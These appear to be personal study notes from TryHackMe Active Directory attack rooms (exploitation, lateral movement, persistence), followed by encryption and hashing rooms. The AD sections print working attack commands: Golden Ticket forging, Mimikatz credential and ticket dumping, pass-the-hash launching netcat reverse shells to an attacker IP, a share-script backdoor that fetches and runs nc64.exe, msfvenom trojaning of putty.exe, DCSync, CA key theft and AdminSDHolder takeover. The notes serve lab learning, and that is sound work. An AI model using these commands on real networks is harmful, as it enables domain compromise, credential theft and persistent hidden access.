C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<cert.pfx> /password:<pfx_password> /outfile:Administrator.kirbi /domain:za.tryhackme.loc /dc:<DC_IP>

# Mimikatz - inject the ticket
privilege::debug
kerberos::ptt administrator.kirbi

Answers

Task 8: Domain Trust Escalation - Golden Ticket to Enterprise Admin

Concept

A bidirectional trust exists between parent and child domains by default. If you have Domain Admin in the child domain and can extract the child's krbtgt hash, you can forge a Golden Ticket with the Enterprise Admin SID from the parent domain - giving you control over the entire forest.

Required Information

Forging the Golden Ticket

CopyInvoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:<CHILD_SID> /sids:<PARENT_SID>-519 /krbtgt:<CHILD_KRBTGT_HASH> /ticket:krbtgt_tkt.kirbi"'

Invoke-Mimikatz -Command '"kerberos::ptt krbtgt_tkt.kirbi"'

Now create an Enterprise Admin in the parent domain:

CopyNew-ADUser -Server <PARENT_DC> -Name "NewAdmin" -AccountPassword(ConvertTo-SecureString "Password00" -Force) -Enabled $true
Add-ADGroupMember -Server <PARENT_DC> -Identity "Enterprise Admins" -Members "NewAdmin"

Answers

🧠 Lessons & Takeaways

Complete AD Attack Lifecycle

CopyBREACHING        → Breaching Active Directory - TryHackMe
  ↓
ENUMERATION      → Enumerating Active Directory - TryHackMe
  ↓
LATERAL MOVEMENT → Lateral Movement and Pivoting - TryHackMe
  ↓
EXPLOITATION     → THIS ROOM
  ├── DACL abuse (GenericWrite, GenericAll)
  ├── Constrained Delegation (Kekeo + S4U)
  ├── SMB Relay (Responder + ntlmrelayx)
  ├── User behavior abuse (keylogging)
  ├── GPO exploitation (Restricted Groups)
  ├── AD CS abuse (certificate forgery → DA)
  └── Domain trust escalation (Golden Ticket → EA)
  ↓
POST-EXPLOITATION → Persistence, domain dominance

AD Exploitation Techniques Summary

🔗 Related Notes

• Active Directory Basics - TryHackMe
• Breaching Active Directory - TryHackMe
• Enumerating Active Directory - TryHackMe
• Lateral Movement and Pivoting - TryHackMe
• Metasploit Meterpreter - TryHackMe
• Windows Privesc Cheat Sheet
• Password Attacks Cheat Sheet
• 📋 Methodology Overview
• 🧰 Tool Index

Tags: #tryhackme #active-directory #exploitation #kerberos #golden-ticket #ad-cs #gpo #ejpt #completed

Lateral Movement and Pivoting

Room Link: TryHackMe - Lateral Movement and Pivoting
Difficulty: 🟡 Medium
Date Started:
Date Completed:
Status: #in-progress
Walkthrough Source: Saksham Baral (Obfuscator) on Medium

🎯 Objective

After breaching and enumerating Active Directory, learn how to move laterally between machines and pivot through networks. Covers remote process spawning (PsExec, WinRM, sc.exe, schtasks), WMI-based execution, Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, abusing writable shares/scripts, RDP hijacking, and SSH port forwarding (local and remote tunneling).

📝 Key Concepts Learned

• Lateral movement = hopping between systems after initial access to reach high-value targets
• Multiple remote execution methods exist: PsExec, WinRM, sc.exe services, scheduled tasks, WMI
• Pass-the-Hash (PtH) lets you authenticate with NTLM hashes - no password cracking needed
• Pass-the-Ticket (PtT) reuses stolen Kerberos tickets from LSASS memory
• Overpass-the-Hash converts an NTLM hash into a Kerberos TGT
• Local UAC strips remote admin privileges from local accounts (except built-in Administrator) - domain accounts bypass this
• SSH tunneling enables pivoting through firewalled network segments

1: Administrators and UAC

Key Distinction

2: Spawning Processes Remotely

PsExec

Copypsexec64.exe \\<TARGET> -u Administrator -p <password> -i cmd.exe

• Port: 445 (SMB)
• Group: Administrators
• Uploads psexesvc.exe to ADMIN$ share → creates a service → executes

WinRM

Copy# Command Prompt
winrs.exe -u:Administrator -p:<password> -r:<TARGET> cmd

# PowerShell - interactive session
Enter-PSSession -ComputerName <TARGET> -Credential $credential

# PowerShell - single command
Invoke-Command -ComputerName <TARGET> -Credential $credential -ScriptBlock {whoami}

• Port: 5985 (HTTP) or 5986 (HTTPS)
• Group: Remote Management Users

Creating Services with sc.exe

Copysc.exe \\<TARGET> create MyService binPath= "net user newuser Pass123 /add" start= auto
sc.exe \\<TARGET> start MyService

# Cleanup
sc.exe \\<TARGET> stop MyService
sc.exe \\<TARGET> delete MyService

• Port: 135 + 49152-65535 (RPC) or 445 (SMB)
• Group: Administrators

Scheduled Tasks

Copyschtasks /s <TARGET> /RU "SYSTEM" /create /tn "MyTask" /tr "<command>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s <TARGET> /run /TN "MyTask"

# Cleanup
schtasks /s <TARGET> /TN "MyTask" /DELETE /F

Remote Execution Comparison

3: WMI-Based Lateral Movement

Setting Up a WMI Session

Copy$username = 'Administrator'
$password = 'Mypass123'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-CimSession -ComputerName <TARGET> -Credential $credential -SessionOption $Opt

Remote Process Creation

CopyInvoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
    CommandLine = "cmd.exe /c <command>"
}

Remote Service Creation

CopyInvoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
    Name = "THMService"; DisplayName = "THMService";
    PathName = "net user munra Pass123 /add";
    ServiceType = [byte]::Parse("16"); StartMode = "Manual"
}

Remote MSI Installation

CopyInvoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{
    PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false
}

4: Alternative Authentication Material

Pass-the-Hash (PtH)

Use NTLM hashes to authenticate without cracking the password.

Extract hashes with Mimikatz:

Copymimikatz # privilege::debug
mimikatz # token::elevate

# From SAM (local accounts only)
mimikatz # lsadump::sam

# From LSASS (local + domain accounts)
mimikatz # sekurlsa::msv

Perform PtH:

Copymimikatz # token::revert
mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.domain.com /ntlm:<HASH> /run:"c:\tools\nc64.exe -e cmd.exe <ATTACKER_IP> 5555"

PtH from Linux:

Copy# RDP
xfreerdp /v:<TARGET> /u:DOMAIN\\user /pth:<NTLM_HASH>

# PsExec (Impacket)
psexec.py -hashes <NTLM_HASH> DOMAIN/user@<TARGET>

# WinRM
evil-winrm -i <TARGET> -u user -H <NTLM_HASH>

Pass-the-Ticket (PtT)

Steal and reuse Kerberos tickets from LSASS memory.

Copymimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

# Inject a ticket
mimikatz # kerberos::ptt <ticket.kirbi>

# Verify
C:\> klist

Overpass-the-Hash / Pass-the-Key

Convert an NTLM hash or AES key into a Kerberos TGT.

Copymimikatz # sekurlsa::ekeys    # Extract all Kerberos keys

# Using RC4 (NTLM hash)
mimikatz # sekurlsa::pth /user:Administrator /domain:company.com /rc4:<NTLM_HASH> /run:"nc64.exe -e cmd.exe <IP> 5556"

# Using AES256
mimikatz # sekurlsa::pth /user:Administrator /domain:company.com /aes256:<AES256_KEY> /run:"nc64.exe -e cmd.exe <IP> 5556"

Authentication Attack Comparison

5: Abusing User Actions

Backdooring Shared Scripts

If a .vbs or .bat file on a writable share is executed by users:

CopyCreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\<ATTACKER>\share\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe <ATTACKER_IP> 1234", 0, True

Backdooring Shared Executables

Copymsfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<IP> lport=4444 -b "\x00" -f exe -o puttyX.exe

Replace the original on the share - users run the backdoored version unknowingly.

RDP Hijacking (Server 2016 and earlier)

If a user disconnects RDP without logging off, their session persists:

Copy# Elevate to SYSTEM
PsExec64.exe -s cmd.exe

# List sessions
query user

# Hijack a disconnected session
tscon <SESSION_ID> /dest:<YOUR_SESSION>

6: Port Forwarding / SSH Tunneling

Local Port Forwarding

Bring a remote service to a machine you control:

Copyssh tunneluser@<ATTACKER_IP> -L *:80:127.0.0.1:80 -N

Anyone connecting to the compromised machine's port 80 is tunneled to the attacker's port 80.

Remote Port Forwarding

Push a remote service back to your attacker machine:

Copyssh tunneluser@<ATTACKER_IP> -R 3389:<TARGET>:3389 -N

Now connect to localhost:3389 on the attacker machine to reach the target's RDP.

Port Forwarding Summary

🧠 Lessons & Takeaways

AD Attack Lifecycle (Complete)

CopyBREACHING        → Breaching Active Directory - TryHackMe
  ↓
ENUMERATION      → Enumerating Active Directory - TryHackMe
  ↓
LATERAL MOVEMENT → THIS ROOM
  ├── Remote execution (PsExec, WinRM, sc.exe, schtasks, WMI)
  ├── Pass-the-Hash / Pass-the-Ticket / Overpass-the-Hash
  ├── Abusing writable shares and user actions
  ├── RDP hijacking
  └── SSH tunneling / port forwarding
  ↓
EXPLOITATION     → Kerberoasting, DCSync, Golden Ticket
  ↓
POST-EXPLOITATION → Persistence, domain dominance

Lateral Movement Decision Tree

CopyGot credentials?
  ├── Plaintext password → PsExec, WinRM, RDP, sc.exe
  ├── NTLM hash → Pass-the-Hash (PtH)
  ├── Kerberos ticket → Pass-the-Ticket (PtT)
  └── AES key → Overpass-the-Hash

Got writable share?
  ├── Maps to web root → Upload web shell (ASPX/PHP)
  ├── Contains scripts → Backdoor .vbs/.bat files
  └── Contains executables → Backdoor with msfvenom

Need to bypass firewall?
  ├── SSH local forwarding (-L) → Bring services to pivot
  └── SSH remote forwarding (-R) → Push services to attacker

🔗 Related Notes

• Active Directory Basics - TryHackMe
• Breaching Active Directory - TryHackMe
• Enumerating Active Directory - TryHackMe
• Metasploit Meterpreter - TryHackMe
• Alfred - TryHackMe
• Relevant - TryHackMe
• Windows Privesc Cheat Sheet
• Password Attacks Cheat Sheet
• 📋 Methodology Overview
• 🧰 Tool Index

Tags: #tryhackme #active-directory #lateral-movement #pivoting #pass-the-hash #kerberos #windows #ejpt #completed

Persisting Active Directory

Room Link: TryHackMe - Persisting Active Directory
Difficulty: 🔴 Hard
Type: Premium (Subscriber)
Date Started:
Date Completed:
Status: #in-progress
Walkthrough Source: Rich (HappyCamper84) on Medium

🎯 Objective

The final room in the AD attack series. After exploiting AD, learn how to maintain persistent access. Covers DCSync for hash extraction, Golden and Silver Ticket forging, AD Certificate persistence (CA private key theft + ForgeCert), SID History injection, group nesting abuse, AdminSDHolder DACL manipulation, and GPO-based persistence. Understand how attackers hide in an AD environment and how defenders can detect it.

📝 Key Concepts Learned

• DCSync extracts all domain hashes remotely by impersonating a Domain Controller's replication
• Golden Tickets (forged TGTs) last 10 years by default and survive password resets (until krbtgt is rotated twice)
• Silver Tickets (forged TGSs) target specific services and are harder to detect but less versatile
• Stealing the CA's private key allows forging any certificate indefinitely - even after the original compromise is remediated
• SID History injection adds the Domain Admins SID to a regular user's history, granting DA rights
• AdminSDHolder ownership change is extremely stealthy - many auditing tools don't track it
• GPO persistence hides well because GPOs are stored as GUIDs in XML - not intuitive to audit

Task 2: DCSync

Concept

DCSync abuses the Domain Controller replication protocol (MS-DRSR) to request password hashes as if you were another DC. Requires Replicating Directory Changes and Replicating Directory Changes All rights (Domain Admins have these by default).

Mimikatz Command

Copymimikatz # lsadump::dcsync /domain:za.tryhackme.loc /user:test

Impacket (from Linux)

Copysecretsdump.py -just-dc Administrator:password@<DC_IP>

# Using Volume Shadow Copy (if regular method fails)
secretsdump.py -just-dc --use-vss Administrator:password@<DC_IP>

Answers

Task 3: Golden & Silver Tickets

Ticket Types

Golden Ticket Persistence

A Golden Ticket survives:
- User password changes
- Account disabling
- Group membership changes

It does NOT survive:
- krbtgt password being reset twice (both current and previous hash must change)

Forging a Golden Ticket

Copymimikatz # kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi
mimikatz # kerberos::ptt golden.kirbi

Answers

Task 4: Certificate Persistence

Concept

If you can steal the CA's private key from the Domain Controller, you can forge any certificate for any user - indefinitely. Even after the original compromise is remediated, the forged certificates remain valid until the CA certificate itself is revoked (which is extremely disruptive and rarely done).

Walkthrough

1. Export the CA certificate and private key from the DC:

Copymimikatz # crypto::certificates /systemstore:local_machine
mimikatz # privilege::debug
mimikatz # crypto::capi
mimikatz # crypto::cng
mimikatz # crypto::certificates /systemstore:local_machine /export

2. Download the .pfx file to your attacker machine

3. Forge a certificate as any user (from any machine, even as a low-priv user):

CopyForgeCert.exe --CaCertPath <ca.pfx> --CaCertPassword mimikatz --Subject CN=User --SubjectAltName [email protected] --NewCertPath fullAdmin.pfx --NewCertPassword Password123

4. Use Rubeus to get a TGT from the forged certificate:

CopyRubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:fullAdmin.pfx /password:Password123 /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:<DC_IP>

5. Inject the ticket:

Copymimikatz # kerberos::ptt administrator.kirbi

Answers

Task 5: SID History Injection

Concept

SID History is an AD attribute designed for domain migrations - it stores SIDs from a user's previous domain. If you inject the Domain Admins SID into a regular user's SID History, that user gets DA rights while appearing to be a normal account.

Walkthrough

Requires stopping the NTDS service and directly modifying NTDS.dit:

Copy$SID = (Get-ADGroup "Domain Admins" -Properties *).SID
Stop-Service -Name ntds -force
Add-ADDBSidHistory -SamAccountName "barbara.reid" -SidHistory $SID -DatabasePath C:\Windows\NTDS\ntds.dit
Start-Service -Name ntds

Verify

CopyGet-ADUser barbara.reid -Properties * | Select SamAccountName, SID, SIDHistory

barbara.reid now has DA rights despite being a regular domain user.

Answers

Task 6: Group Nesting

Concept

AD groups can be members of other groups (nesting). Deeply nested group memberships are hard to audit and can hide persistence. Add a compromised account to a nested group chain that eventually grants admin rights.

Copy# Add user to a group
Add-ADGroupMember -Identity "thmgroup" -Members "thmtest"

# Query nested group membership (recursive)
(Get-ADGroupMember -Identity "Testing" -Recursive).SamAccountName

Answers

Task 7: AdminSDHolder Persistence

Concept

AdminSDHolder is a special AD object whose DACLs are used as a template for all Protected Groups (Domain Admins, Enterprise Admins, etc.). The SDProp process periodically applies AdminSDHolder's DACLs to these groups.

If you give yourself Full Control (GenericAll) on AdminSDHolder, SDProp will propagate that permission to every Protected Group - giving you persistent control over all admin groups.

Stealthier Method: Change Ownership

Changing AdminSDHolder's owner doesn't modify the DACL - many auditing tools miss this:

CopySet-Location AD:
$ADRoot = (Get-ADDomain).DistinguishedName
$target = (Get-ADObject "cn=AdminSDHolder,cn=System,$ADRoot").DistinguishedName
$acl = Get-Acl $target
$user = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser "barbara.reid").SID
$acl.SetOwner($user)
Set-ACL $target $acl

Now the owner can grant themselves GenericAll at any time of their choosing.

Answers

Task 8: GPO Persistence

Concept

GPOs are stored as GUIDs in XML format - not intuitive to audit. If you can modify a GPO that applies to servers or DCs, you can persist through Restricted Groups, scheduled tasks, logon scripts, etc.

Copy# List all GPOs with their GUIDs
$ADRoot = (Get-ADDomain).DistinguishedName
Get-ADObject -Filter * -SearchBase "cn=policies,cn=system,$ADRoot" -Properties * | Select ObjectGUID, DisplayName, Name

Answers

🧠 Lessons & Takeaways

AD Persistence Techniques Summary

Complete AD Attack Lifecycle - FINISHED

CopyTHEORY           → Active Directory Basics - TryHackMe
  ↓
BREACHING        → Breaching Active Directory - TryHackMe
  ↓
ENUMERATION      → Enumerating Active Directory - TryHackMe
  ↓
LATERAL MOVEMENT → Lateral Movement and Pivoting - TryHackMe
  ↓
EXPLOITATION     → Exploiting Active Directory - TryHackMe
  ↓
PERSISTENCE      → THIS ROOM ✅
  ├── DCSync (hash extraction)
  ├── Golden Ticket (forged TGT - 10yr lifetime)
  ├── Silver Ticket (forged TGS - service-specific)
  ├── Certificate forgery (CA private key → any user)
  ├── SID History injection (DA SID in normal user)
  ├── Group nesting (hidden membership chains)
  ├── AdminSDHolder (template DACL poisoning)
  └── GPO persistence (hidden in GUID XML)

Defensive Audit Commands

Copy# Check for non-default AdminSDHolder owners
$ADRoot = (Get-ADDomain).DistinguishedName
$target = (Get-ADObject "cn=AdminSDHolder,cn=System,$ADRoot").DistinguishedName
(Get-Acl $target).Owner

# Check SID History on all users
Get-ADUser -Filter * -Properties SIDHistory | Where-Object {$_.SIDHistory -ne $null}

# List all GPOs
Get-ADObject -Filter * -SearchBase "cn=policies,cn=system,$ADRoot" -Properties * | Select ObjectGUID, DisplayName

# Check for accounts with DCSync rights
# (Replicating Directory Changes + Replicating Directory Changes All)

🔗 Related Notes

• Active Directory Basics - TryHackMe
• Breaching Active Directory - TryHackMe
• Enumerating Active Directory - TryHackMe
• Lateral Movement and Pivoting - TryHackMe
• Exploiting Active Directory - TryHackMe
• Metasploit Meterpreter - TryHackMe
• Windows Privesc Cheat Sheet
• 📋 Methodology Overview
• 🧰 Tool Index

Tags: #tryhackme #active-directory #persistence #golden-ticket #dcsync #ad-cs #ejpt #completed

Encryption - Crypto 101

Room Link: TryHackMe - Encryption - Crypto 101
Difficulty: 🟡 Medium
Date Started:
Date Completed:
Status: #in-progress
Walkthrough Source: Temidayo Adejumo on Medium

🎯 Objective

Understand the fundamentals of encryption: symmetric vs asymmetric, RSA, key exchange, digital signatures, certificates, SSH authentication, PGP/GPG, and AES. This is theory-heavy but essential for understanding how crypto underpins everything from HTTPS to SSH to CTF challenges.

📝 Key Concepts Learned

• Symmetric encryption uses one key (fast, AES); asymmetric uses a key pair (slow, RSA)
• RSA security relies on the difficulty of factoring large numbers - CTFs often give you variables to break it
• Asymmetric crypto is used to exchange symmetric keys (best of both worlds)
• Certificates prove server identity via a chain of trust back to a Certificate Authority
• SSH keys can be passphrase-protected - crack with ssh2john + John the Ripper
• GPG is the open-source implementation of PGP - used for file encryption and digital signatures
• Quantum computing threatens current encryption - NIST is developing post-quantum standards

Task 2: Key Terms

Answers

Task 3: Why is Encryption Important?

Cryptography protects three things (the CIA triad):

• Confidentiality - only authorized parties can read the data
• Integrity - data hasn't been tampered with
• Authenticity - data comes from who it claims to come from

Answers

Task 4: Crucial Crypto Maths

The modulo operator (%) returns the remainder after division. It shows up constantly in cryptography (especially RSA).

Copy# Python examples
30 % 5    # = 0  (divides evenly)
25 % 7    # = 4  (25 = 3*7 + 4)
118613842 % 9091  # = 3

Answers

Task 5: Types of Encryption

Symmetric vs Asymmetric

Algorithm Status

Answers

Task 6: RSA (Rivest Shamir Adleman)

How RSA Works

RSA is based on the mathematical difficulty of factoring large numbers. Multiplying two primes is easy (17 × 23 = 391), but finding the factors of a large product is extremely hard.

RSA Variables for CTFs

Public key = (n, e)
Private key = (n, d)

CTF Tools for RSA

• RsaCtfTool - automated RSA attack tool
• rsatool - generate RSA keys from components
• MuirlandOracle's RSA blog - deep dive into the math

Answers

Task 7: Establishing Keys Using Asymmetric Cryptography

The Key Exchange Problem

Symmetric encryption is fast but requires both parties to share a key securely. Asymmetric encryption solves this:

Copy1. Server sends its PUBLIC key to the client (anyone can see it)
2. Client generates a symmetric key (e.g., AES session key)
3. Client encrypts the symmetric key WITH the server's public key
4. Client sends the encrypted symmetric key to the server
5. Server decrypts with its PRIVATE key → both now share the symmetric key
6. All further communication uses fast symmetric encryption

This is the foundation of HTTPS/TLS - asymmetric crypto used once to exchange a symmetric key, then symmetric crypto for the actual data.

Task 8: Digital Signatures and Certificates

Digital Signatures

Signatures prove authenticity (who created it) and integrity (it hasn't been modified):

CopySigner → hash the data → encrypt hash with PRIVATE key → signature
Verifier → decrypt signature with PUBLIC key → compare to hash of data

Certificates

Certificates prove a server's identity. They contain the server's public key and are signed by a Certificate Authority (CA).

Chain of trust: Your browser trusts root CAs → root CAs sign intermediate CAs → intermediate CAs sign server certificates.

Answers

Task 9: SSH Authentication

SSH Key-Based Auth

SSH supports key-based authentication using asymmetric key pairs. The private key stays on your machine; the public key goes on the server. Private keys can be protected with a passphrase.

Cracking SSH Key Passphrases

Copy# Step 1: Extract the hash
ssh2john id_rsa > ssh_hash.txt

# Step 2: Crack with John
john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash.txt

Answers

Task 10: Diffie-Hellman Key Exchange

Diffie-Hellman (DH) allows two parties to establish a shared secret over an insecure channel without ever transmitting the secret itself. It's based on the mathematical difficulty of the discrete logarithm problem.

DH is often used alongside RSA - DH establishes the shared secret, while RSA digital signatures verify the identity of each party (preventing man-in-the-middle attacks).

Task 11: PGP, GPG, and AES

PGP / GPG

GPG private keys can be passphrase-protected (crack with gpg2john + John).

Using GPG in CTFs

Copy# Import a private key
gpg --import private_key.asc

# Decrypt a file
gpg --decrypt encrypted_file.gpg

# View the decrypted output
cat decrypted_file.txt

AES

Advanced Encryption Standard - the current standard symmetric cipher, replacing DES. Uses 128, 192, or 256-bit keys. Extremely common and considered secure.

Answers

Task 12: The Future - Quantum Computing

Quantum computers can efficiently solve the mathematical problems that RSA and ECC rely on (factoring large numbers, discrete logarithms). This means current asymmetric encryption will eventually be breakable.

NIST is developing post-quantum cryptography standards to replace vulnerable algorithms before quantum computers become powerful enough to break them.

Symmetric encryption (like AES) is less affected - doubling the key size (e.g., AES-256) is expected to remain secure against quantum attacks.

🧠 Lessons & Takeaways

Encryption vs Hashing vs Encoding

How HTTPS/TLS Actually Works

Copy1. Client connects to server
2. Server sends certificate (containing public key)
3. Client verifies certificate against trusted CAs
4. Client generates symmetric session key
5. Client encrypts session key with server's public key
6. Server decrypts with private key → shared secret established
7. All traffic encrypted with fast symmetric encryption (AES)

Crypto in CTFs - What to Know

🔗 Related Notes

• Hashing Crypto 101 - TryHackMe
• John the Ripper Basics - TryHackMe
• 📋 Methodology Overview
• Password Attacks Cheat Sheet
• 🧰 Tool Index

📚 Further Resources

• RsaCtfTool - automated RSA attack tool
• MuirlandOracle RSA Blog - RSA math deep dive
• Diffie-Hellman Explained (Video)
• AES Explained - Computerphile (Video)
• NIST Post-Quantum Crypto

Tags: #tryhackme #encryption #networking #ejpt #completed

Hashing - Crypto 101

Room Link: TryHackMe - Hashing - Crypto 101
Difficulty: 🟡 Medium
Date Started:
Date Completed:
Status: #in-progress
Walkthrough Source: Dehni on Medium

🎯 Objective

Understand hashing fundamentals: what hash functions are, how they differ from encryption, how passwords are stored and cracked, how to recognize hash types, and how hashing is used for integrity verification. Practical tasks include cracking hashes with John the Ripper and online tools.

📝 Key Concepts Learned

• Hashing is one-way (no key, can't reverse); encryption is two-way (key required, can decrypt)
• Encoding (Base64, hex) is NOT encryption - it's immediately reversible with no key
• Salting passwords prevents rainbow table attacks by making each hash unique
• Context matters for hash identification - a hash in a web app database is likely MD5, not NTLM
• Unix hashes have prefixes that tell you the algorithm; Windows NTLM hashes look like MD4/MD5
• John the Ripper can auto-detect many hash types; hashcat requires you to specify the mode

Key Terminology

Answers

Hash Functions

Properties of Good Hash Functions

• Takes any size input, produces fixed size output
• Deterministic - same input always produces same output
• Fast to compute, extremely slow to reverse
• Small input change = large output change (avalanche effect)
• Collision resistant - hard to find two inputs that produce the same hash

Hash Collisions

A collision is when two different inputs produce the same output. Due to the pigeonhole effect, collisions can't be completely avoided - there are infinite possible inputs but finite possible outputs. Good hash functions make collisions extremely difficult to engineer intentionally.

Common Hash Output Sizes

Answers

Hashing for Password Verification

Why Not Plaintext?

Storing passwords in plaintext is catastrophic if the database leaks. The rockyou.txt wordlist came from exactly this - a company stored passwords in plaintext and got breached, leaking 14+ million passwords.

Why Not Encryption?

You can't encrypt passwords because the key must be stored somewhere. If someone gets the key, they decrypt everything.

How Password Hashing Works

1. User creates password → app hashes it → stores only the hash
2. User logs in → app hashes the submitted password → compares to stored hash
3. Match = authenticated, no match = denied
4. The actual password is never stored

The Rainbow Table Problem

If two users have the same password, they'll have the same hash. An attacker can pre-compute a lookup table (rainbow table) mapping millions of hashes to their plaintext passwords.

Salting: The Solution

A salt is a random value (unique per user) added to the password before hashing:

Copyhash(salt + password) → stored_hash

• Stored alongside the hash in the database (salts don't need to be secret)
• Eliminates rainbow table attacks - each user's hash is unique even with identical passwords
• Algorithms like bcrypt and sha512crypt handle salting automatically

Answers

Recognizing Password Hashes

Unix Hash Prefixes

Unix-style hashes follow the format: $format$rounds$salt$hash